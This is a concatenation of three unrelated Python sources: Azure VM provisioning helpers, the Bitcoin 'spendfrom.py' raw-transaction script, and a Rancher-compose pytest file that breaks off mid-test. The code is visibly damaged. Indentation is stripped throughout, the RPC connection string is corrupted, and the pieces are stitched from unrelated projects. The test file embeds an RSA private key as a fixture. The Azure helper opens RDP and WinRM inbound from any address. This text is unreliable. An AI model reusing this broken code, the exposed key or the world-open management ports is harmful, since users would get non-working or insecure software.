def create_nic(self, vm_name, nsg=None):
"""
        Create a VM network interface with a public IP address.
        :param vm_name: VM name, also used for the public IP and DNS label
        :param nsg: if truthy, create and attach a network security group
            allowing inbound RDP (3389) and WinRM over HTTPS (5986)
        :return: NetworkInterface object
"""
create_public_ip = self.network_client.public_ip_addresses.create_or_update(
self.group_name, vm_name + '-ip',
{'location': self.location,
'public_ip_allocation_method': 'Dynamic',
'public_ip_address_version': 'IPv4',
'dns_settings': {
'domain_name_label': vm_name}})
public_ip = create_public_ip.result()
nic_parameters = {'location': self.location,
'ip_configurations': [{'name': self.ip_config_name,
'subnet': {'id': self.subnet.id},
'public_ip_address': {'id': public_ip.id}}]
}
if self.sriov == constants.ENABLED:
log.info('Adding Accelerated Networking')
nic_parameters['enable_accelerated_networking'] = True
if nsg:
create_nsg = self.network_client.network_security_groups.create_or_update(
self.group_name, vm_name + '-nsg',
{'location': self.location})
self.network_client.security_rules.create_or_update(
self.group_name, create_nsg.result().name, 'default-allow-rdp',
{'protocol': 'Tcp',
'source_address_prefix': '*',
'destination_address_prefix': '*',
'access': 'Allow',
'direction': 'Inbound',
'source_port_range': '*',
'destination_port_range': '3389',
'priority': 1000})
self.network_client.security_rules.create_or_update(
self.group_name, create_nsg.result().name, 'wsman-https',
{'protocol': 'Tcp',
'source_address_prefix': '*',
'destination_address_prefix': '*',
'access': 'Allow',
'direction': 'Inbound',
'source_port_range': '*',
'destination_port_range': '5986',
'priority': 1001})
log.info('Adding custom security group to NIC')
nic_parameters['network_security_group'] = create_nsg.result()
nic_name = self.nic_name + str(time.time())
nic_op = self.network_client.network_interfaces.create_or_update(
self.group_name, nic_name, nic_parameters)
log.info('Created NIC: {}'.format(nic_name))
return nic_op.result()
def attach_disk(self, vm_instance, disk_size=0, device=0):
"""
        Create and attach an empty data disk to a VM.
        :param vm_instance: VirtualMachine object to attach the disk to
        :param disk_size: disk size in GB
        :param device: LUN to attach the disk on
        :return: name of the created disk
"""
disk_name = vm_instance.name + '_disk_' + str(time.time())
disk_profile = {'name': disk_name,
'disk_size_gb': disk_size,
'caching': 'None',
'lun': device,
'vhd': {'uri': "http://{}.blob.core.windows.net/vhds/{}.vhd".format(
self.storage_account, disk_name)},
'create_option': 'Empty'}
vm_instance.storage_profile.data_disks.append(disk_profile)
vm_update = self.compute_client.virtual_machines.create_or_update(self.group_name,
vm_instance.name,
vm_instance)
vm_update.wait()
try:
vm_update.result()
log.info('Created disk: {}'.format(disk_name))
except Exception as de:
log.info(de)
return disk_name
def restart_vm(self, vm_name):
"""
        Restart a VM instance.
"""
vm_instance = self.compute_client.virtual_machines.get(self.group_name, vm_name)
log.info('Restarting VM: {}'.format(vm_name))
vm_restart = self.compute_client.virtual_machines.restart(self.group_name, vm_name)
vm_restart.wait()
time.sleep(120)
return vm_instance
def teardown(self):
"""
Cleanup created instances and devices.
"""
log.info("Running teardown.")
# Delete Resource group and everything in it
delete_resource_group = self.resource_client.resource_groups.delete(self.group_name)
try:
delete_resource_group.wait()
except CloudError as ce:
log.info(ce)
            if 'AuthorizationFailed' in str(ce):
log.info("Resource group {} already removed".format(self.group_name))
log.info("Deleted: {}".format(self.group_name))
|
|
#!/usr/bin/env python
#
# Use the raw transactions API to spend bitcoins received on particular addresses,
# and send any change back to that same address.
#
# Example usage:
# spendfrom.py # Lists available funds
# spendfrom.py --from=ADDRESS --to=ADDRESS --amount=11.00
#
# Assumes it will talk to a bitcoind or Bitcoin-Qt running
# on localhost.
#
# Depends on jsonrpc
#
from decimal import *
import getpass
import math
import os
import os.path
import platform
import sys
import time
from jsonrpc import ServiceProxy, json
BASE_FEE=Decimal("0.001")
def check_json_precision():
"""Make sure json library being used does not lose precision converting BTC values"""
n = Decimal("20000000.00000003")
satoshis = int(json.loads(json.dumps(float(n)))*1.0e8)
if satoshis != 2000000000000003:
raise RuntimeError("JSON encode/decode loses precision")
def determine_db_dir():
"""Return the default location of the bitcoin data directory"""
if platform.system() == "Darwin":
return os.path.expanduser("~/Library/Application Support/Bitcoin/")
elif platform.system() == "Windows":
return os.path.join(os.environ['APPDATA'], "Bitcoin")
return os.path.expanduser("~/.bitcoin")
def read_bitcoin_config(dbdir):
"""Read the bitcoin.conf file from dbdir, returns dictionary of settings"""
from ConfigParser import SafeConfigParser
class FakeSecHead(object):
def __init__(self, fp):
self.fp = fp
self.sechead = '[all]\n'
def readline(self):
if self.sechead:
try: return self.sechead
finally: self.sechead = None
else:
s = self.fp.readline()
if s.find('#') != -1:
s = s[0:s.find('#')].strip() +"\n"
return s
config_parser = SafeConfigParser()
config_parser.readfp(FakeSecHead(open(os.path.join(dbdir, "bitcoin.conf"))))
return dict(config_parser.items("all"))
def connect_JSON(config):
"""Connect to a bitcoin JSON-RPC server"""
testnet = config.get('testnet', '0')
testnet = (int(testnet) > 0) # 0/1 in config file, convert to True/False
if not 'rpcport' in config:
config['rpcport'] = 20460 if testnet else 10460
connect = "http://%s:%[email protected]:%s"%(config['rpcuser'], config['rpcpassword'], config['rpcport'])
try:
result = ServiceProxy(connect)
# ServiceProxy is lazy-connect, so send an RPC command mostly to catch connection errors,
# but also make sure the bitcoind we're talking to is/isn't testnet:
if result.getmininginfo()['testnet'] != testnet:
sys.stderr.write("RPC server at "+connect+" testnet setting mismatch\n")
sys.exit(1)
return result
except:
sys.stderr.write("Error connecting to RPC server at "+connect+"\n")
sys.exit(1)
def unlock_wallet(bitcoind):
info = bitcoind.getinfo()
if 'unlocked_until' not in info:
return True # wallet is not encrypted
t = int(info['unlocked_until'])
if t <= time.time():
try:
passphrase = getpass.getpass("Wallet is locked; enter passphrase: ")
bitcoind.walletpassphrase(passphrase, 5)
except:
sys.stderr.write("Wrong passphrase\n")
info = bitcoind.getinfo()
return int(info['unlocked_until']) > time.time()
def list_available(bitcoind):
address_summary = dict()
address_to_account = dict()
for info in bitcoind.listreceivedbyaddress(0):
address_to_account[info["address"]] = info["account"]
unspent = bitcoind.listunspent(0)
for output in unspent:
# listunspent doesn't give addresses, so:
rawtx = bitcoind.getrawtransaction(output['txid'], 1)
vout = rawtx["vout"][output['vout']]
pk = vout["scriptPubKey"]
# This code only deals with ordinary pay-to-bitcoin-address
# or pay-to-script-hash outputs right now; anything exotic is ignored.
if pk["type"] != "pubkeyhash" and pk["type"] != "scripthash":
continue
address = pk["addresses"][0]
if address in address_summary:
address_summary[address]["total"] += vout["value"]
address_summary[address]["outputs"].append(output)
else:
address_summary[address] = {
"total" : vout["value"],
"outputs" : [output],
"account" : address_to_account.get(address, "")
}
return address_summary
def select_coins(needed, inputs):
# Feel free to improve this, this is good enough for my simple needs:
outputs = []
have = Decimal("0.0")
n = 0
while have < needed and n < len(inputs):
outputs.append({ "txid":inputs[n]["txid"], "vout":inputs[n]["vout"]})
have += inputs[n]["amount"]
n += 1
return (outputs, have-needed)
def create_tx(bitcoind, fromaddresses, toaddress, amount, fee):
all_coins = list_available(bitcoind)
total_available = Decimal("0.0")
needed = amount+fee
potential_inputs = []
for addr in fromaddresses:
if addr not in all_coins:
continue
potential_inputs.extend(all_coins[addr]["outputs"])
total_available += all_coins[addr]["total"]
if total_available < needed:
sys.stderr.write("Error, only %f BTC available, need %f\n"%(total_available, needed));
sys.exit(1)
#
# Note:
# Python's json/jsonrpc modules have inconsistent support for Decimal numbers.
# Instead of wrestling with getting json.dumps() (used by jsonrpc) to encode
# Decimals, I'm casting amounts to float before sending them to bitcoind.
#
outputs = { toaddress : float(amount) }
(inputs, change_amount) = select_coins(needed, potential_inputs)
if change_amount > BASE_FEE: # don't bother with zero or tiny change
change_address = fromaddresses[-1]
if change_address in outputs:
outputs[change_address] += float(change_amount)
else:
outputs[change_address] = float(change_amount)
rawtx = bitcoind.createrawtransaction(inputs, outputs)
signed_rawtx = bitcoind.signrawtransaction(rawtx)
if not signed_rawtx["complete"]:
sys.stderr.write("signrawtransaction failed\n")
sys.exit(1)
txdata = signed_rawtx["hex"]
return txdata
def compute_amount_in(bitcoind, txinfo):
result = Decimal("0.0")
for vin in txinfo['vin']:
in_info = bitcoind.getrawtransaction(vin['txid'], 1)
vout = in_info['vout'][vin['vout']]
result = result + vout['value']
return result
def compute_amount_out(txinfo):
result = Decimal("0.0")
for vout in txinfo['vout']:
result = result + vout['value']
return result
def sanity_test_fee(bitcoind, txdata_hex, max_fee):
class FeeError(RuntimeError):
pass
try:
txinfo = bitcoind.decoderawtransaction(txdata_hex)
total_in = compute_amount_in(bitcoind, txinfo)
total_out = compute_amount_out(txinfo)
if total_in-total_out > max_fee:
raise FeeError("Rejecting transaction, unreasonable fee of "+str(total_in-total_out))
        fee = total_in - total_out  # the implied fee is whatever is not paid back out
        tx_size = len(txdata_hex)/2
kb = tx_size/1000 # integer division rounds down
if kb > 1 and fee < BASE_FEE:
raise FeeError("Rejecting no-fee transaction, larger than 1000 bytes")
if total_in < 0.01 and fee < BASE_FEE:
raise FeeError("Rejecting no-fee, tiny-amount transaction")
# Exercise for the reader: compute transaction priority, and
# warn if this is a very-low-priority transaction
except FeeError as err:
sys.stderr.write((str(err)+"\n"))
sys.exit(1)
def main():
import optparse
parser = optparse.OptionParser(usage="%prog [options]")
parser.add_option("--from", dest="fromaddresses", default=None,
help="addresses to get bitcoins from")
parser.add_option("--to", dest="to", default=None,
help="address to get send bitcoins to")
parser.add_option("--amount", dest="amount", default=None,
help="amount to send")
parser.add_option("--fee", dest="fee", default="0.0",
help="fee to include")
parser.add_option("--datadir", dest="datadir", default=determine_db_dir(),
help="location of bitcoin.conf file with RPC username/password (default: %default)")
parser.add_option("--testnet", dest="testnet", default=False, action="store_true",
help="Use the test network")
parser.add_option("--dry_run", dest="dry_run", default=False, action="store_true",
help="Don't broadcast the transaction, just create and print the transaction data")
(options, args) = parser.parse_args()
check_json_precision()
config = read_bitcoin_config(options.datadir)
if options.testnet: config['testnet'] = True
bitcoind = connect_JSON(config)
if options.amount is None:
address_summary = list_available(bitcoind)
for address,info in address_summary.iteritems():
n_transactions = len(info['outputs'])
if n_transactions > 1:
print("%s %.8f %s (%d transactions)"%(address, info['total'], info['account'], n_transactions))
else:
print("%s %.8f %s"%(address, info['total'], info['account']))
else:
fee = Decimal(options.fee)
amount = Decimal(options.amount)
        while not unlock_wallet(bitcoind):
pass # Keep asking for passphrase until they get it right
txdata = create_tx(bitcoind, options.fromaddresses.split(","), options.to, amount, fee)
sanity_test_fee(bitcoind, txdata, amount*Decimal("0.01"))
if options.dry_run:
print(txdata)
else:
txid = bitcoind.sendrawtransaction(txdata)
print(txid)
if __name__ == '__main__':
main()
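# Illustrative dry-run sketch (not executed): mirrors what main() does with
# --dry_run, using only the helper functions defined above. The address
# arguments are placeholders; a reachable, funded bitcoind is assumed.
def _example_dry_run(from_address, to_address):
    config = read_bitcoin_config(determine_db_dir())
    bitcoind = connect_JSON(config)
    amount = Decimal("0.5")
    fee = Decimal("0.001")
    txdata = create_tx(bitcoind, [from_address], to_address, amount, fee)
    sanity_test_fee(bitcoind, txdata, amount * Decimal("0.01"))
    return txdata  # inspect, or broadcast with bitcoind.sendrawtransaction(txdata)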
|
|
from common_fixtures import * # NOQA
import subprocess
from subprocess import Popen
from os import path
import os
import sys
import pytest
import cattle
import ConfigParser
PROJECTS = []
CERT = '''-----BEGIN CERTIFICATE-----
MIIDJjCCAg4CCQDLCSjwGXM72TANBgkqhkiG9w0BAQUFADBVMQswCQYDVQQGEwJB
VTETMBEGA1UECBMKU29tZS1TdGF0ZTEhMB8GA1UEChMYSW50ZXJuZXQgV2lkZ2l0
cyBQdHkgTHRkMQ4wDAYDVQQDEwVhbGVuYTAeFw0xNTA3MjMwMzUzMDdaFw0xNjA3
MjIwMzUzMDdaMFUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIEwpTb21lLVN0YXRlMSEw
HwYDVQQKExhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQxDjAMBgNVBAMTBWFsZW5h
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxdVIDGlAySQmighbfNqb
TtqetENPXjNNq1JasIjGGZdOsmFvNciroNBgCps/HPJphICQwtHpNeKv4+ZuL0Yg
1FECgW7oo6DOET74swUywtq/2IOeik+i+7skmpu1o9uNC+Fo+twpgHnGAaGk8IFm
fP5gDgthrWBWlEPTPY1tmPjI2Hepu2hJ28SzdXi1CpjfFYOiWL8cUlvFBdyNqzqT
uo6M2QCgSX3E1kXLnipRT6jUh0HokhFK4htAQ3hTBmzcxRkgTVZ/D0hA5lAocMKX
EVP1Tlw0y1ext2ppS1NR9Sg46GP4+ATgT1m3ae7rWjQGuBEB6DyDgyxdEAvmAEH4
LQIDAQABMA0GCSqGSIb3DQEBBQUAA4IBAQA45V0bnGPhIIkb54Gzjt9jyPJxPVTW
mwTCP+0jtfLxAor5tFuCERVs8+cLw1wASfu4vH/yHJ/N/CW92yYmtqoGLuTsywJt
u1+amECJaLyq0pZ5EjHqLjeys9yW728IifDxbQDX0cj7bBjYYzzUXp0DB/dtWb/U
KdBmT1zYeKWmSxkXDFFSpL/SGKoqx3YLTdcIbgNHwKNMfTgD+wTZ/fvk0CLxye4P
n/1ZWdSeZPAgjkha5MTUw3o1hjo/0H0ekI4erZFrZnG2N3lDaqDPR8djR+x7Gv6E
vloANkUoc1pvzvxKoz2HIHUKf+xFT50xppx6wsQZ01pNMSNF0qgc1vvH
-----END CERTIFICATE-----
'''
KEY = '''-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAxdVIDGlAySQmighbfNqbTtqetENPXjNNq1JasIjGGZdOsmFv
NciroNBgCps/HPJphICQwtHpNeKv4+ZuL0Yg1FECgW7oo6DOET74swUywtq/2IOe
ik+i+7skmpu1o9uNC+Fo+twpgHnGAaGk8IFmfP5gDgthrWBWlEPTPY1tmPjI2Hep
u2hJ28SzdXi1CpjfFYOiWL8cUlvFBdyNqzqTuo6M2QCgSX3E1kXLnipRT6jUh0Ho
khFK4htAQ3hTBmzcxRkgTVZ/D0hA5lAocMKXEVP1Tlw0y1ext2ppS1NR9Sg46GP4
+ATgT1m3ae7rWjQGuBEB6DyDgyxdEAvmAEH4LQIDAQABAoIBAEKeWL29L9DL+KJg
wBYiM0xxeCHxzKdHFW+Msvdhh3wUpK6S+vUclxb3NHA96RnhU8EH3jeMokDADkTr
Us1eiy2T/gkCBRscymeqUetO49IUAahyYg/nU1X7pg7eQmNkSnHmvQhE3UDjQNdJ
zJYkrROIQWZZVNIib+VLlbXTi0WIYcoukS+Jy2lfABLZbYVFMOEOv5IfRvXTjcgc
jiHUbamYM9ADR/mtupFTShyVV2UBoI8cuWSPJnWNHZ39TN61owNoVycxfagBlheO
Jb07cY0DSSx9968RYRzX9YGMUCpnoleWG5Qg29ySaLDJWqpEkNXdeJlJ+0RzErFr
TrnlXMECgYEA6OTUpfRHu8m1yhqF9HK0+aiOPVLBOkFc55Ja/dBaSApaYtcU5ZYe
IlCgGRM1+3G3bzwrwunbAdGVKdd+SiXLY5+p08HW0sFSgebdkRtcTmbq1Gvns+Fx
ZUX9QBxZq7jiQjHde68y1kpSqJfjeHktZ1voueZ0JUZwx9c7YDC/+V0CgYEA2XX1
W9f7b4Om740opDwgSLIEgIpBqSrSoJQQNzcOAWbY2CTY5xUqM9WbitlgbJ9Bo0Zo
jyHmsp3CLGz8onv7wlR67WJSqriedIBJLQD2DnmQpb3j61rNLruhcxTC5phtBheN
0ZQrO0SmfCjevLefc3jmB0Uu9qfvkoZoJPXAfRECgYEAvxbK+CPYG9fkhiB/GtRn
c5V+qAhXrUHmRceLS0iCWyvLf9/0MHCc5xD6W7isiVSD6wwW6AXTgcmCN2OuJo6e
NG7T/IDGkAS5ewZ/c8lcUqQVOBgVdD2dOjhUFB9u3/yCAUhC73IQJ02yRszhgn8C
5xS9fpL9Z3xFm2MZP9KgIa0CgYBksg1ygPmp8pF7fabjHgBpCR2yk9LBzdWIi+dS
Wgj/NyuUMsPJhXBsXi5PRkczJS+Utoa2OKGF9i0yuyjk6Hp0yv+9KnlTGngtRDYe
Q8Ksgzgqt1px4jL+v92L14JEmzJozsFZ2b2HDUv2VEqHopOQOdxyY2PSzYLPG7Pf
4XhHsQKBgEfRPtokHpt+dJ6RhdUTEQAoT2jDVGhZLaYbtGh5Jtf2F5mhQR3UlvVi
FH/0iMK8IRo8XhFw0lrmZvY0rC0ycFGewvdW5oSvZvStATObGRMHUYNdbMEAMu86
dkOGpBSMzSXoZ2d0rKcetwRWZqUadDJnakNfZkjIY64sbd5Vo4ev
-----END RSA PRIVATE KEY-----
'''
class Compose(object):
def __init__(self, client, compose_bin):
self.compose_bin = compose_bin
self.client = client
def check_retcode(self, input, check_retcode, *args, **kw):
p = self.call(*args, **kw)
output = p.communicate(input=input)
retcode = p.wait()
assert check_retcode == retcode
return output
def check_call(self, input, *args):
p = self.call(*args)
output = p.communicate(input=input)
retcode = p.wait()
assert 0 == retcode
return output
def call(self, *args, **kw):
env = {
'RANCHER_CLIENT_DEBUG': 'true',
'RANCHER_ACCESS_KEY': self.client._access_key,
'RANCHER_SECRET_KEY': self.client._secret_key,
'RANCHER_URL': self.client._url,
}
cmd = [self.compose_bin]
cmd.extend(args)
kw_args = {
'env': env,
'stdin': subprocess.PIPE,
'stdout': sys.stdout,
'stderr': sys.stderr,
'cwd': _base(),
}
kw_args.update(kw)
return Popen(cmd, **kw_args)
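# Note (illustrative): Compose shells out to the rancher-compose binary with the
# client's credentials exported in the environment. A typical call from the
# tests below pipes a compose YAML template on stdin, e.g.:
#   compose.check_call(template, '--verbose', '-f', '-', '-p', project_name,
#                      'up', '-d')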
@pytest.fixture(scope='session')
def client(admin_user_client, request):
try:
return cattle.from_env(url=os.environ['RANCHER_URL'],
access_key=os.environ['RANCHER_ACCESS_KEY'],
secret_key=os.environ['RANCHER_SECRET_KEY'])
except KeyError:
pass
try:
config = ConfigParser.ConfigParser()
config.read(path.join(_base(), '../../tox.ini'))
return cattle.from_env(url=config.get('rancher', 'url'),
access_key=config.get('rancher', 'access-key'),
secret_key=config.get('rancher', 'secret-key'))
except ConfigParser.NoOptionError:
pass
return new_context(admin_user_client, request).client
def _file(f):
return path.join(_base(), '../../../../{}'.format(f))
def _base():
return path.dirname(__file__)
@pytest.fixture(scope='session')
def compose_bin():
c = _file('bin/rancher-compose')
assert path.exists(c)
return c
def _clean_all(client):
for p in PROJECTS:
client.delete(p)
@pytest.fixture(scope='session')
def compose(client, compose_bin, request):
return new_compose(client, compose_bin, request)
def new_compose(client, compose_bin, request):
request.addfinalizer(lambda: _clean_all(client))
return Compose(client, compose_bin)
def create_project(compose, operation='create', project_name=None, file=None,
input=None):
if project_name is None:
project_name = random_str()
if file is not None:
compose.check_call(None, '--verbose', '-f', file, '-p', project_name,
operation)
elif input is not None:
compose.check_call(input, '--verbose', '-f', '-', '-p', project_name,
operation)
PROJECTS.append(project_name)
return project_name
@pytest.mark.skipif('True')
def test_build(client, compose):
project_name = create_project(compose, file='assets/build/test.yml')
project = find_one(client.list_environment, name=project_name)
service = find_one(project.services)
assert service.name == 'fromfile'
assert service.launchConfig.build.dockerfile == 'subdir/Dockerfile'
assert service.launchConfig.build.remote is None
assert service.launchConfig.build.context.startswith('https://')
def test_args(client, compose):
project_name = create_project(compose, file='assets/full-with-build.yml')
project_with_build = find_one(client.list_environment, name=project_name)
service = find_one(project_with_build.services)
assert service.launchConfig.build == {
'dockerfile': 'something/other',
'remote': 'github.com/ibuildthecloud/tiny-build',
}
project_name = create_project(compose, file='assets/full-with-image.yml')
project_with_image = find_one(client.list_environment, name=project_name)
service = find_one(project_with_image.services)
assert service.launchConfig.imageUuid == 'docker:nginx'
for project in (project_with_build, project_with_image):
service = find_one(project.services)
assert service.name == 'web'
launch_config = service.launchConfig
assert launch_config.command == ['/bin/sh', '-c']
assert len(launch_config.ports) == 2
for p in launch_config.ports:
assert p == '80:81/tcp' or p.endswith(':123/tcp')
assert launch_config.dataVolumes == ['/tmp/foo', '/tmp/x:/tmp/y']
assert launch_config.environment == {'foo': 'bar', 'a': 'b'}
assert launch_config.dns == ['8.8.8.8', '1.1.1.1']
assert launch_config.capAdd == ['ALL', 'SYS_ADMIN']
assert launch_config.capDrop == ['NET_ADMIN', 'SYS_ADMIN']
assert launch_config.dnsSearch == ['foo.com', 'bar.com']
assert launch_config.entryPoint == ['/bin/foo', 'bar']
assert launch_config.workingDir == '/somewhere'
assert launch_config.user == 'somebody'
assert launch_config.hostname == 'myhostname'
assert launch_config.domainName == 'example.com'
assert launch_config.memory == 100
assert launch_config.memorySwap == 101
assert launch_config.privileged
assert launch_config.stdinOpen
assert launch_config.tty
assert 'name' not in launch_config
assert launch_config.cpuShares == 42
assert launch_config.cpuSet == '1,2'
assert launch_config.devices == ['/dev/sda:/dev/a:rwm',
'/dev/sdb:/dev/c:ro']
s = 'io.rancher.service.selector.'
assert launch_config.labels['io.rancher.service.hash'] is not None
del launch_config.labels['io.rancher.service.hash']
assert launch_config.labels == {'a': 'b',
s + 'link': 'bar in (a,b)',
s + 'container': 'foo',
'c': 'd'}
assert service.selectorLink == 'bar in (a,b)'
assert service.selectorContainer == 'foo'
assert launch_config.securityOpt == ['label:foo', 'label:bar']
assert launch_config.pidMode == 'host'
assert launch_config.logConfig == {
'driver': 'syslog',
'config': {
'tag': 'foo',
}
}
assert launch_config.extraHosts == ['host:1.1.1.1', 'host:2.2.2.2']
assert launch_config.networkMode == 'host'
assert launch_config.volumeDriver == 'foo'
# Not supported
# assert launch_config.externalLinks == ['foo', 'bar']
def test_git_build(client, compose):
template = '''
nginx:
build: github.com/ibuildthecloud/tiny-build
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
service = find_one(project.services)
assert service.launchConfig.build == {
'remote': 'github.com/ibuildthecloud/tiny-build',
}
assert service.launchConfig.imageUuid is not None
prefix = 'docker:{}_nginx_'.format(project_name)
assert service.launchConfig.imageUuid.startswith(prefix)
def test_circular_sidekick(client, compose):
template = '''
primary:
stdin_open: true
image: busybox
command: cat
labels:
io.rancher.sidekicks: secondary
volumes_from:
- secondary
secondary:
stdin_open: true
image: busybox
command: cat
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
service = find_one(project.services)
assert service.launchConfig.dataVolumesFromLaunchConfigs == ['secondary']
secondary = filter(lambda x: x.name == 'secondary',
service.secondaryLaunchConfigs)
assert len(secondary) == 1
def test_delete(client, compose):
template = '''
web:
image: nginx
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
service = find_one(project.services)
assert service.state == 'inactive'
compose.check_call(template, '--verbose', '-f', '-', '-p', project_name,
'up', '-d')
service = client.wait_success(service)
assert service.state == 'active'
compose.check_call(template, '--verbose', '-f', '-', '-p', project_name,
'rm', '--force')
service = client.wait_success(service)
assert service.state == 'removed'
def test_delete_while_stopped(client, compose):
template = '''
web:
image: nginx
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
service = find_one(project.services)
assert service.state == 'inactive'
compose.check_call(template, '--verbose', '-f', '-', '-p', project_name,
'rm', 'web')
service = client.wait_success(service)
assert service.state == 'removed'
def test_network_bridge(client, compose):
template = '''
web:
net: bridge
image: nginx
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
service = find_one(project.services)
assert service.launchConfig.networkMode == 'bridge'
def test_network_none(client, compose):
template = '''
web:
net: none
image: nginx
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
service = find_one(project.services)
assert service.launchConfig.networkMode == 'none'
def test_network_container(compose, client):
template = '''
foo:
labels:
io.rancher.sidekicks: web
image: nginx
web:
net: container:foo
image: nginx
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
service = find_one(project.services)
assert service.launchConfig.networkMode == 'managed'
assert service.secondaryLaunchConfigs[0].networkMode == 'container'
assert service.secondaryLaunchConfigs[0].networkLaunchConfig == 'foo'
def test_network_managed(client, compose):
template = '''
web:
net: managed
image: nginx
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
service = find_one(project.services)
assert service.launchConfig.networkMode == 'managed'
def test_network_default(client, compose):
template = '''
web:
image: nginx
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
service = find_one(project.services)
assert service.launchConfig.networkMode == 'managed'
def test_env_file(client, compose):
project_name = create_project(compose, file='assets/base.yml')
project = find_one(client.list_environment, name=project_name)
assert project.name == project_name
second = _get_service(project.services(), 'base')
assert second.launchConfig.environment == {
'bar': 'baz',
'd': 'e',
'env': '2',
'foo': 'bar',
'a': 'b',
}
def test_extends(client, compose):
project_name = create_project(compose, file='assets/base.yml')
project = find_one(client.list_environment, name=project_name)
assert project.name == project_name
base = _get_service(project.services(), 'base')
local = _get_service(project.services(), 'local')
other_base = _get_service(project.services(), 'other-base')
assert base.launchConfig.imageUuid == 'docker:second'
assert local.launchConfig.imageUuid == 'docker:local'
assert local.launchConfig.ports == ['80:80/tcp']
assert local.launchConfig.environment == {'key': 'value'}
assert other_base.launchConfig.ports == ['80:80/tcp', '81:81/tcp']
assert other_base.launchConfig.imageUuid == 'docker:other'
assert other_base.launchConfig.environment == {'key': 'value',
'key2': 'value2'}
def test_extends_1556(client, compose):
project_name = create_project(compose,
file='assets/extends/docker-compose.yml')
project = find_one(client.list_environment, name=project_name)
assert project.name == project_name
web = _get_service(project.services(), 'web')
db = _get_service(project.services(), 'db')
assert web.launchConfig.imageUuid == 'docker:ubuntu:14.04'
assert db.launchConfig.imageUuid == 'docker:ubuntu:14.04'
web = find_one(db.consumedservices)
assert web.name == 'web'
def test_extends_1556_2(compose):
with pytest.raises(AssertionError):
create_project(compose, file='assets/extends_2/docker-compose.yml')
def test_lb_private(client, compose):
template = '''
lb:
expose:
- 111:222
- 222:333/tcp
image: rancher/load-balancer-service
ports:
- 80
links:
- web
- web2
web:
image: nginx
web2:
image: nginx'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
assert len(project.services()) == 3
lb = _get_service(project.services(), 'lb')
assert lb.launchConfig.expose == ['111:222', '222:333/tcp']
def test_lb_basic(client, compose):
template = '''
lb:
image: rancher/load-balancer-service
ports:
- 80:80
links:
- web
- web2
web:
image: nginx
web2:
image: nginx'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
assert len(project.services()) == 3
lb = _get_service(project.services(), 'lb')
web = _get_service(project.services(), 'web')
web2 = _get_service(project.services(), 'web2')
maps = client.list_service_consume_map(serviceId=lb.id)
assert len(maps) == 2
for map in maps:
if map.consumedServiceId == web.id:
assert map.ports == []
elif map.consumedServiceId == web2.id:
assert map.ports == []
else:
assert False
assert lb.type == 'loadBalancerService'
assert lb.launchConfig.ports == ['80:80']
def test_lb_default_port_http(client, compose):
template = '''
lb:
image: rancher/load-balancer-service
ports:
- 7900:80/tcp
links:
- web
web:
image: nginx
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
assert len(project.services()) == 2
lb = _get_service(project.services(), 'lb')
web = _get_service(project.services(), 'web')
assert lb.launchConfig.ports == ['7900:80/tcp']
map = find_one(client.list_service_consume_map, serviceId=lb.id)
assert map.consumedServiceId == web.id
assert map.ports == []
assert lb.launchConfig.ports == ['7900:80/tcp']
def test_lb_default_port_with_mapped_tcp(client, compose):
template = '''
lb:
image: rancher/load-balancer-service
ports:
- 80:8080/tcp
links:
- web
web:
image: nginx
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
assert len(project.services()) == 2
lb = _get_service(project.services(), 'lb')
assert lb.launchConfig.ports == ['80:8080/tcp']
web = _get_service(project.services(), 'web')
map = find_one(client.list_service_consume_map, serviceId=lb.id)
assert map.consumedServiceId == web.id
assert map.ports == []
assert lb.launchConfig.ports == ['80:8080/tcp']
def test_lb_default_port_with_tcp(client, compose):
template = '''
lb:
image: rancher/load-balancer-service
ports:
- 80/tcp
links:
- web
web:
image: nginx
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
assert len(project.services()) == 2
lb = _get_service(project.services(), 'lb')
web = _get_service(project.services(), 'web')
map = find_one(client.list_service_consume_map, serviceId=lb.id)
assert map.consumedServiceId == web.id
assert map.ports == []
    assert lb.launchConfig.ports == ['80/tcp']
def test_lb_path_space_target(client, compose):
template = '''
lb:
image: rancher/load-balancer-service
ports:
- 80:8080
labels:
io.rancher.loadbalancer.target.web: "hostname/path:6000,
7000"
links:
- web
web:
image: nginx
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
assert len(project.services()) == 2
lb = _get_service(project.services(), 'lb')
web = _get_service(project.services(), 'web')
maps = client.list_service_consume_map(serviceId=lb.id)
assert len(maps) == 1
for map in maps:
if map.consumedServiceId == web.id:
assert map.ports == ['hostname/path:6000',
'7000']
else:
assert False
assert lb.type == 'loadBalancerService'
def test_lb_path_name(client, compose):
template = '''
lb:
image: rancher/load-balancer-service
ports:
- 80:8080
labels:
io.rancher.loadbalancer.target.web: hostname/path:6000,hostname:7000
io.rancher.loadbalancer.target.web2: "9000"
links:
- web
- web2
- web3
web:
image: nginx
web2:
image: nginx
web3:
image: nginx'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
assert len(project.services()) == 4
lb = _get_service(project.services(), 'lb')
web = _get_service(project.services(), 'web')
web2 = _get_service(project.services(), 'web2')
    web3 = _get_service(project.services(), 'web3')
maps = client.list_service_consume_map(serviceId=lb.id)
assert len(maps) == 3
for map in maps:
if map.consumedServiceId == web.id:
assert map.ports == ['hostname/path:6000',
'hostname:7000']
elif map.consumedServiceId == web2.id:
assert map.ports == ['9000']
elif map.consumedServiceId == web3.id:
